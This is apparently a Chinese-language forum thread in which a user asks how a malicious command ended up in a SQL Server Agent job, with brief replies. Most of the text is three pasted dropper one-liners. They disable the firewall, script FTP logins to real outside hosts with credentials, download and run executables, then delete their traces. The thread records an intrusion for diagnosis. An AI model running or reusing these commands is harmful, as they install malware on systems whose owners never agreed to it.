cmd /c "sc config SQLSERVERAGENT start= AUTO&net1 stop sharedaccess&echo open lgpk.8866.org>>cmd.txt&echo liu>>cmd.txt&echo wen>>cmd.txt&echo binary >>cmd.txt&echo get an.exe>>cmd.txt&echo get kk.exe>>cmd.txt&echo get Qb.exe>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&an.exe&an.exe&kk.exe&kk.exe&Qb.exe&Qb.exe&del cmd.txt /q /f&exit"这段代码单独保存文本,杀毒软件就报时病毒。真不知道文本还能当病毒用怎么执行啊、
还有这个SQL作业里的代码。可能是怎么写进去的?是通过网站还是远程连接SQL的??

解决方案 »

 1.   

  从ftp服务器上下载qq.exe等病毒执行完后自行删除
    

 2.   

  cmd /c echo open 121.37.42.68>c:\RECYCLER\zy123.exe&echo 110>>c:\RECYCLER\zy123.exe&echo 110>>c:\RECYCLER\zy123.exe&echo get 123.exe c:\RECYCLER\st123.exe>>c:\RECYCLER\zy123.exe&echo bye>>c:\RECYCLER\zy123.exe&ftp -s:c:\RECYCLER\zy123.exe&if EXIST c:\RECYCLER\st123.exe (start c:\RECYCLER\st123.exe)&del c:\RECYCLER\zy123.exe&exit
    

 3.   

  cmd /c echo open www.ahadsl.com>c:\RECYCLER\zy2.exe&echo zxj81311>>c:\RECYCLER\zy2.exe&echo 4417815>>c:\RECYCLER\zy2.exe&echo get 2.exe c:\RECYCLER\st2.exe>>c:\RECYCLER\zy2.exe&echo bye>>c:\RECYCLER\zy2.exe&ftp -s:c:\RECYCLER\zy2.exe&if EXIST c:\RECYCLER\st2.exe (start c:\RECYCLER\st2.exe)&del c:\RECYCLER\zy2.exe&exit